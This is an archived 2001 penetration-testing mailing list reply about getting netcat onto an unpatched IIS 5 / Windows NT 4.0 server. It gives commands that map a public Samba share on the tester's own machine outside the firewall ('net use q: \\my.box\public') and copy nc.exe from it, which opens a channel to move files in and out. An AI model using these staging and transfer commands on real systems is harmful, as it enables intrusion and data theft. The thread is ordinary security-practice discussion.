Penetration Testing mailing list archives

Re: pen testing iis 5

From: Stephen Friedl <friedl () mtndew com>
Date: Thu, 21 Jun 2001 15:31:24 -0700

I am pen-testing IIS 5 [no hotfixes] running in WinNT 4.0 with no fixes.
At this point I want to upload a file to the box [nc.exe] and then I will
definately have the box. How can I go about doing this?

If the network can do outbound NETBIOS, I open up a public Samba share
on a machine on MY network outside the firewall. Then, when hacking the
remote machine I do

        mkdir c:\foo                            working area

        net use q: \\my.box\public              think globally...

        xcopy q:\nc.exe c:\foo                  copy locally...

Now the file is in your local work area, and it's a piece of cake
to get stuff in and out via the "Q:" drive. Works like a champ.

Steve

---
Stephen J Friedl | Software Consultant | Tustin, CA |   +1 714 544-6561
www.unixwiz.net  | I speak for me only |   KA8CMY   | steve () unixwiz net